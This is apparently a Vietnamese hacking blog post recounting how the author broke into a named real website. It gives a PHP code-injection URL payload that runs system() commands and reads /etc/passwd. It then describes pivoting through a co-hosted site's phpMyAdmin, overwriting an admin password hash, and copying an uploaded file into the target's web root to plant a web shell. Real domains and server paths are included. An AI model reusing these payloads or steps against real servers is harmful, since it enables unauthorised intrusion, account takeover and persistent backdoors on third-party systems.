Trích dẫn
_http://cefacom.org.vn/forum/forumdisplay.php?fid=2&sortby='];system('ls');//
Do nó đã bị ku nào tài lanh + pro "hacked" nên anh em ko còn đc thực hành nữa, có gì thì chửa rủa thèn đó
Tham khảo tại đây nếu bạn chư biết
Theo tớ biết Remote Code Execution cho phép chúng ta thực thi các hàm của php "từ xa"
Các cậu có thể test thử
Trích dẫn
cat /etc/passwd
ls -la
ls -la
...
Chỉ có điều là do server dis cái url jj đó nên ko thể chơi include file từ host khác đc và dĩ nhiên ko thể wget
Ở đây sẽ có nhiều cách để make shell, và tớ đã chọn cách đơn giản nhất
Kịch bản:
- Tìm cách up 1 file "bất kỳ" lên server
- Dùng câu lệnh cp
Nói thì nói vậy như khi làm thì mới thấy gặp nhiều vấn đề
Đầu tiên tớ cat /etc/passwd
Trích dẫn
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
......
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
......
Lướt sơ qua tớ thấy cái này
Trích dẫn
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
Như vậy ta có thể biết server sài directadmin (tương tự cho cpanel)
directadmin thì sao? như vậy con đường mình chọn khả thi
directadmin có "lối vào" để quản lý host như sau:
http://domain:2222
và http://domain:phpmyadmin -> quan trọng là cái này, khác với các Hosting controler khác như như cpanel hay plest
server xài directadmin cho phép ta truy cập "trực tiếp" vào phpmyadmin chỉ cần biết info về database mà ko cần biết pass host.
Okie, dạo 1 vòng tớ chọn tớ chọn 1 em để làm bàn đạp, lấy file, xem dir,...
Và tớ lấy các file quan trong của nó để lấy thông tin. Có 1 khó khăn nho nhỏ ở đây là tất cả các file đã bị zend. Ko sao cả sao khi dezend lần lượt các file file quan trọng tớ dã login đc vào phpmyadmin của site đó
Lướt tới phần admin account tớ thấy có khà nhiều user, thử crack nhưng ko thành công okie tớ edit pass của 1 user để login thử xem... vẫn ko thành công. why?
Lần này tới lấy thêm các file khác trong đó có file check login nó như sau:
Trích dẫn
$username = addslashes( $_POST['name'] );
$password = addslashes( $_POST['password'] );
$mahoa = md5( md5( "xmr".addslashes( $_POST['password'] ) ) );
$password = addslashes( $_POST['password'] );
$mahoa = md5( md5( "xmr".addslashes( $_POST['password'] ) ) );
Đề ý cái dòng dưới cùng thì ra pass nó được "băm" ra 2 lần md5 + "xmr".addslashes
Okie sau 1' lay hoay tớ edit lại cái của 1 user theo đó và login vào lại ---> thành công
Vào được admincp rồi thì các cậu biết phải làm gì rồi nhé, tớ up 1 file "ảnh" lên, nó cho up tất tần tật, tuy nhiên sau khi up nó cũng rename tất tần tật luôn.
Ko sao quan trọng là ta đã co file trên server
Bây giờ quan lại với anh chàng _http://cefacom.org.vn
Tớ sử sụng câu lệnh:
Code:
Trích dẫn
cp /path/fileanh.jpg /home/wcmspro/domains/vietnamonline24.net/public_html/treem/forum/tinoo.php
Ai ko hiều câu lệnh này là gì thì tớ khuyên nên tìm 1 quyển linux căn bản mà xem trước khi muốn trở thành "hacker"
Okie nó sẽ như vầy
Trích dẫn
_http://cefacom.org.vn/forum/forumdisplay.php?fid=2&sortby='];system('cp /path/fileanh.jpg /home/wcmspro/domains/vietnamonline24.net/public_html/treem/forum/tinoo.php');//
Ở đây /path/fileanh.jpg là path của cái file ảnh tớ đã up trên thèn "bàn đạp", còn /home/wcmspro/domains/vietnamonline24.net/public_html/treem/forum/ thì là path của cefaom (tớ cứ hay nhầm là cafe ôm mới chết )
Okie, kết quả là đây _http://cefacom.org.vn/forum/tinoo.php
Tớ cũng muốn public pass lắm nhưng cứ gặp cái sự "hacked,hehehe coi tao hack được ròai nè V ơi" thì ớn lắm.
Bonus: nếu như server nó ko xài directadmin thì sao? thì với cách này dĩ nhiên là ta vẫn tìm cách đưa file lên server trước bất cấp là file gì. Dĩ nhiên là vẫn còn cách khác, bổ sung nhé.
Điều quan trọng là chúng ta đã đạt được mục đích.
Theo Tinoo Hcegroup.net
No comments:
Post a Comment